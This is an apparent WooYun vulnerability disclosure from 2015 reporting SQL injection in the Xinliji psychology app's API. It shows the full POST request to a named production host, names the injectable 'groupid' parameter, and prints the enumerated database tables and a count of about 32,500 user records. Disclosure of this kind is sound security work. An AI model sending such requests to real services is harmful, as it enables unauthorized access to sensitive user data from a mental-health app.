漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0149534
漏洞标题:心理记APP某处SQL注入漏洞涉及3W多用户数据
相关厂商:心理记
漏洞作者: sauren
提交时间:2015-10-26 15:07
修复时间:2015-12-10 15:08
公开时间:2015-12-10 15:08
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-26: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-10: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
如题所述。
详细说明:
接口如下:
POST /social/groupinfo HTTP/1.1
Host: api.xinliji.me
Pragma-Token:
Accept-Language: zh-CN
Pragma-Device: 3f065f492417b51bb2b29a20246710fc4144122c
User-Agent: XinLiJiMe/1.5.1 (iPhone; iOS 7.1.1; Scale/2.00)
Accept: */*
Accept-Encoding: gzip, deflate
Pragma-DeviceType: 4
longitude: 120.218978
Pragma-Encoding: gzip
latitude: 30.252254
Content-Type: application/x-www-form-urlencoded
Pragma-OS: MApi 3.0 (qj.ios; AppStore; iPhone; 7.1.1)
Connection: keep-alive
Proxy-Connection: keep-alive
Content-Length: 21
userid: 0
groupid=304&userid=0
groupid参数存在SQL注入。
Database: xljdb
[125 tables]
+-------------------------------+
| BATCH_JOB_EXECUTION |
| BATCH_JOB_EXECUTION_CONTEXT |
| BATCH_JOB_EXECUTION_PARAMS |
| BATCH_JOB_EXECUTION_SEQ |
| BATCH_JOB_INSTANCE |
| BATCH_JOB_SEQ |
| BATCH_STEP_EXECUTION |
| BATCH_STEP_EXECUTION_CONTEXT |
| BATCH_STEP_EXECUTION_SEQ |
| authassignment |
| authitem |
| authitemchild |
| people |
| tbl_about |
| tbl_action_balance |
| tbl_action_score |
| tbl_action_value |
| tbl_admin |
| tbl_agency |
| tbl_agreement |
| tbl_alipay_transaction |
| tbl_anchor |
| tbl_authassignment |
| tbl_authitem |
| tbl_authitemchild |
| tbl_autofollows |
| tbl_banner |
| tbl_banner_param |
| tbl_blacklist |
| tbl_blocked_device |
| tbl_chat |
| tbl_clinic |
| tbl_code |
| tbl_comment |
| tbl_consultant |
| tbl_consultant_apply |
| tbl_consultant_call |
| tbl_consultant_call_deduction |
| tbl_consultant_comment |
| tbl_consultant_event |
| tbl_consultant_event_item |
| tbl_consultant_label |
| tbl_consultant_online |
| tbl_consultant_order |
| tbl_consultant_order_taken |
| tbl_consultant_reserve |
| tbl_consultant_session |
| tbl_consultant_setting |
| tbl_consultant_state |
| tbl_consultant_term |
| tbl_daily |
| tbl_dream |
| tbl_dream_comment |
| tbl_dream_msg |
| tbl_dream_repo |
| tbl_ency_catg |
| tbl_ency_content |
| tbl_ency_subcatg |
| tbl_event_label |
| tbl_exchange |
| tbl_follow |
| tbl_gift |
| tbl_gift_message |
| tbl_gift_transaction |
| tbl_gift_user |
| tbl_group |
| tbl_group_bak |
| tbl_group_block |
| tbl_group_pending |
| tbl_group_user |
| tbl_group_user_bak |
| tbl_house_rent |
| tbl_iap_receipt |
| tbl_iap_transaction |
| tbl_like |
| tbl_message |
| tbl_mood |
| tbl_mood_result |
| tbl_mood_wall |
| tbl_msg_session |
| tbl_news |
| tbl_news_notification |
| tbl_occupation |
| tbl_photos |
| tbl_place |
| tbl_preference |
| tbl_product |
| tbl_psy_catg |
| tbl_psy_exam |
| tbl_psy_exam_option |
| tbl_psy_exam_question |
| tbl_psy_exam_result |
| tbl_psy_exam_user |
| tbl_qq_index |
| tbl_report |
| tbl_sso_ticket |
| tbl_subject |
| tbl_subject_event |
| tbl_subject_event_item |
| tbl_subject_event_map |
| tbl_subject_follow |
| tbl_suggestion |
| tbl_tag_catg |
| tbl_tag_catg_item |
| tbl_task |
| tbl_user |
| tbl_user_event |
| tbl_user_event_draft |
| tbl_user_event_item |
| tbl_user_event_item_draft |
| tbl_user_gift |
| tbl_user_group_block |
| tbl_user_label |
| tbl_user_mood |
| tbl_user_photo |
| tbl_user_task |
| tbl_vendor |
| tbl_verifycode |
| tbl_version |
| tbl_visit |
| tbl_wechat_index |
| tbl_wechat_pay_notify |
| tbl_wechat_pay_order |
| tbl_weibo_index |
| tbl_word_temp |
+-------------------------------+
125张表
漏洞证明:
Database: xljdb
+----------+---------+
| Table | Entries |
+----------+---------+
| tbl_user | 32536 |
+----------+---------+
3W多用户。
修复方案:
严格过滤
版权声明:转载请注明来源 sauren@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝